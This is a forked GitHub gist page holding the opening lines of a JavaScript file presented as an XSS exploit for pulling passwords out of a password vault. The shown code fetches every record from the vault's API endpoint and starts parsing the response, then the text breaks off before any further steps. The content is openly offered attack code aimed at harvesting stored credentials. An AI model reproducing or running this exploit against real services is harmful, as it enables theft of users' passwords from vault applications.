Skip to content

Instantly share code, notes, and snippets.

View abbas512's full-sized avatar
🌴
On vacation

wafa abbas abbas512

🌴
On vacation
View GitHub Profile
@abbas512
abbas512 / password_vault_exploit.js
Created December 2, 2018 15:13 — forked from shawarkhanethicalhacker/password_vault_exploit.js
XSS Exploit code for retrieving passwords stored in a Password Vault
//Exploit Code by Shawar Khan
var data_chunks = '';
// Capturing Records from API
fetch('https://redacted.com/api/v3/records/all').then((resp) => resp.text()).then(function(data) {
// Holds the records in as String
var allrecords = data;
// converting response to JSON